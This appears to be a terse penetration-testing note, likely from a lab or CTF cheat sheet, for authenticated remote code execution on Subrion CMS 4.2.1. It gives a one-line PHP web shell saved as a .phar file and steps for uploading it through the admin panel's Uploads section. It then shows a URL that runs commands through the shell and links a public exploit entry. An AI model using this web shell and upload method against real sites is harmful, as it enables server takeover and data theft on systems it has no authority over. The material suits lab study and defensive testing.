Subrion CMS 4.2.1
Need user creds and access to admin panel
[1]From kali, craft an RCE script and save as .phar file
<?php system($_GET['cmd']); ?>
[2] Saved on kali as: exploit.phar
[3] From Subrion admin panel navigate to Content โ Uploads
Just drag and drop, save file and right click on it to copy the file location
[4] Trigger RCE
http://10.10.10.10/uploads/exploit.phar?cmd=id (# location of exploit might vary)
#There is also an authenticated exploit on exploitdb https://www.exploit-db.com/exploits/49876
Last updated